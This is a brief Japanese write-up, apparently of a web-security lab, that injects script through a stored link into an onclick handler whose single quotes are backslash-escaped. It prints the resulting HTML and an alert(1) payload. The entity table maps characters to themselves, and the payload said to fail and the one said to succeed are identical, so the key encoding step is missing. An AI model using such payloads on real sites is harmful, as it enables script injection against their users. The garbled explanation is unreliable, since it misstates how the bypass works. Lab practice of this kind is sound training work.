Hello there, ('ω')ノ
XSSをカギ括弧と二重引用符でHTMLエンコードして。
一重引用符と円記号をエスケープしてonclickイベントに格納を。
まずは、動作確認から。
名前にリンクが貼られ。
HTMLコードは、以下のとおりで。
<a id="author" href="https://google.com" onclick="var tracker={track(){}};tracker.track('https://google.com');">Neo</a>
アンカーをクリックしてスクリプトを実行されたいので、下記を入力すると。
シングルクォートがバックスラッシュでエスケープされて。
https://google.com?'-alert(1)-'
エンティティ参照は以下のようで。
< (右大なり) <
> (左大なり) >
& (アンパーサント) &
" (ダブルクォーテーション) "
' (シングルクォーテーション) '
スクリプトが実行されるように下記のように入力して。
https://google.com?'-alert(1)-'
スクリプトが実行されて。
クリアできた。
Best regards, (^^ゞ